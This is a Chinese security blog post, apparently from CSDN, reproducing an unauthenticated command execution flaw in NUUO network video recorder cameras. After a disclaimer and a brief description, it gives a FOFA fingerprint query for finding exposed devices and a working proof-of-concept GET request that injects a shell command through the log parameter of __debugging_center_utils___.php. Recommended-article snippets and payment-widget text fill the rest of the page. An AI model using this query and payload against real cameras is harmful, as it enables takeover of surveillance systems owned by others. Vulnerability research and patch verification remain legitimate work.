NUUO摄像机debugging_center_utils远程代码执行

最新推荐文章于 2025-07-27 22:03:33 发布
原创 最新推荐文章于 2025-07-27 22:03:33 发布 · 152 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #漏洞复现 #网络安全 #漏洞利用 #漏洞库 #渗透测试

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,NUUO摄像头debugging_center_utils存在未授权命令执行,攻击者可以获取服务器权限

fofa

body="www.nuuo.com/eHelpdesk.php"

poc

GET /__debugging_center_utils___.php?log=;id HTTP/1.1
Host: 
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
 

问题来源
 

 

                

        

    

    
  



    



                



	

		

			

				
					
漏洞复现】瑞友天翼应用虚拟化系统-SQL注入-ConsoleExternalApi.XGI

				
			

			

				

					知黑而守白
				

				

					06-19
					
					1350
					
				

			

		

		

			
				
瑞友天翼虚拟化系统是一种基于虚拟化技术的系统,旨在提高硬件资源利用率和灵活性,降低成本,提高效率,适用于各种规模的企业和组织。瑞友天翼虚拟化系统ConsoleExternalApi.XGI接口处存在SQL注入漏洞,恶意攻击者可能会利用漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。

			
		

	



                

            
              



	

		

			

				
					
NUUO摄像头 debugging_center_utils 远程命令执行漏洞复现

				
			

			

				

					iSee857的博客
				

				

					10-30
					
					428
					
				

			

		

		

			
				
‌是由中国台湾NUUO公司生产的一款网络视频录像机(Network Video Recorder,简称NVR),广泛应用于零售、交通、教育、政府和银行等多个领域。它能够同时管理多个IP摄像头,实现视频录制、存储、回放及远程监控等功能,采用先进的视频处理技术,提供高清、流畅的视频画面,满足各种复杂环境下的监控需求‌。NUUO NVR摄像头在debugging_center_utils接口处存在远程命令执行,攻击者可通过该漏洞在服务器上执行任意命令,获取服务器权限。厂商已发布补丁 请即时修复。

			
		

	



              


  
              

                


	

		

			

				
					
百易云资产管理系统admin.ticket.close.php存在SQL注入

				
			

			

				

					swordheart的博客
				

				

					05-23
					
					245
					
				

			

		

		

			
				
百易云资产管理系统在admin.ticket.close.php接口下存在sql注入

			
		

	





	

		

			

				
					
sql注入合集_禅道sql注入

				
			

			

				

					2501_90424690的博客
				

				

					02-03
					
					405
					
				

			

		

		

			
				
用sqlmap跑一下。

			
		

	



		

			
		



	

		

			

				
					
漏洞复现--金和OA clobfield SQL注入

				
			

			

				

					qq_53003652的博客
				

				

					12-19
					
					931
					
				

			

		

		

			
				
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品存在SQL注入漏洞

			
		

	





	

		

			

				
					
禅道16.5 SQL注入(CNVD-2022-42853)

				
			

			

				

					qq_50854662的博客
				

				

					02-15
					
					1230
					
				

			

		

		

			
				
禅道16.5 SQL注入(CNVD-2022-42853)

			
		

	





	

		

			

				
					
漏洞复现NUUO摄像头远程命令执行漏洞

				
			

			

				

					m0_46381222的博客
				

				

					10-30
					
					880
					
				

			

		

		

			
				
漏洞复现NUUO摄像头远程命令执行漏洞

			
		

	





	

		

			

				
					
NUUO摄像头远程命令执行漏洞复现 [附POC]

				
			

			

				

					薛定谔嘚喵博客
				

				

					10-26
					
					919
					
				

			

		

		

			
				
NUUO Network Video Recorder(NVR)是中国台湾NUUO公司的一款网络视频记录器。NUUO NVR视频存储管理设备__debugging_center_utils___.php存在未授权远程命令执行漏洞,攻击者可在没有任何权限的情况下通过log参数执行任意PHP代码,从而入侵服务器,获取服务器的管理员权限。

			
		

	





	

		

			

				
					
禅道V16.5SQL注入漏洞(CNVD-2022-42853)

				
			

			

				

					RestoreJustice的博客
				

				

					03-23
					
					968
					
				

			

		

		

			
				
禅道项目管理软件是一款国产的、基于LGPL协议、开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。在登录处未对用户输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行,攻击者可利用漏洞获取数据库敏感信息。

			
		

	





	

		

			

				
					
金和OA 数据字典 c6

				
			

			

				

					09-06
				

			

		

		

			
				
金和OA系统,C6数据库-数据字典,分享以供大家参考,借鉴

			
		

	





	

		

			

				
					
金和OA C6/S-系统管理员手册.pdf

				
			

			

				

					07-31
				

			

		

		

			
				
详细介绍金和OA C6版系统管理使用手册

			
		

	





	

		

			

				
					
金和OA,C6配置手册

				
			

			

				

					08-31
				

			

		

		

			
				
金和办公OA系统,C6版本配置手册,一般你找不到哦。

			
		

	





	

		

			

				
					
sql注入攻击linux下的xampp网站,从SQL注入到Getshell:记一次禅道系统的渗透

				
			

			

				

					weixin_32830601的博客
				

				

					05-14
					
					636
					
				

			

		

		

			
				
SQL注入分析网上之前有过一个9.1.2的orderBy函数的分析,但是没想到9.2.1也存在此问题,(2018.3.2号看到目前最新版本是9.8.1)。出问题的地方是此文件的orderBy函数:\lib\base\dao\dao.class.php对于limit后未做严格的过滤与判断,然后拼接到了order by后面导致产生注入.$order = join(',', $orders) . ' '...

			
		

	





	

		

			

				
					
limit 后注入_从SQL注入到Getshell:记一次禅道系统的渗透

				
			

			

				

					weixin_39605326的博客
				

				

					11-29
					
					217
					
				

			

		

		

			
				
此过程为某站点的渗透记录,过程一波三折,但归根结底都是粗心大意造成的,不过自我认为在这个排坑的过程中也学习到了很多。确认版本首先可以通过接口来确认一下当前禅道的版本。http://example.com/index.php?mode=getconfigSQL注入分析网上之前有过一个9.1.2的orderBy函数的分析,但是没想到9.2.1也存在此问题,(2018.3.2号看到目前最新版本是9.8....

			
		

	





	

		

			

				
					
金和OA C6任意文件读取漏洞 复现[附POC]

				
			

			

				

					薛定谔嘚喵博客
				

				

					10-11
					
					1242
					
				

			

		

		

			
				
金和OA C6系统的download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器的敏感信息。

			
		

	





	

		

			

				
					
金和OA GetSqlData.aspx 远程命令执行漏洞

				
			

			

				

					xiaokp7的博客
				

				

					09-13
					
					913
					
				

			

		

		

			
				
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞

			
		

	





	

		

			

				
					
sql注入合集

				
			

			

				

					Aiwin的博客
				

				

					05-08
					
					1178
					
				

			

		

		

			
				
sql注入合集,持续收集。

			
		

	





	

		

			

				
					
crypto插件的用法

				
			

			

				

					talk_8的专栏
				

				

					09-07
					
					744
					
				

			

		

		

			
				
加密主要是为了保护一些重要数据,我们在实际项目中会用到加密工具,因此在本章回中介绍一个加密工具包:crypto.本章回中将详细介绍该包的使用方法。我们可以使用crypto包中的接口实现加密功能;

			
		

	





	

		

			

				
					
点击劫持:潜藏在指尖的安全陷阱

					
最新发布

				
			

			

				

					fys15925190510的博客
				

				

					07-27
					
					999
					
				

			

		

		

			
				
随后,通过代码将这些恶意元素设置为全透明状态,并精准覆盖在用户可能点击的正常按钮上,如 “关闭广告”“查看详情” 等。在网页端,攻击者可能搭建一个看似正常的视频网站,当用户点击 “播放” 按钮时,透明的恶意元素会引导用户点击 “确认下载某软件”,而该软件实则为病毒或挖矿程序。例如,当用户在某款工具类 APP 中点击 “领取优惠券” 时,实际触发的是 “允许该应用发送付费短信” 的授权弹窗,导致手机被强制扣除话费。例如,点击后弹出带有随机验证码的确认框,或要求用户拖动滑块完成验证,确保操作是用户的真实意图。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值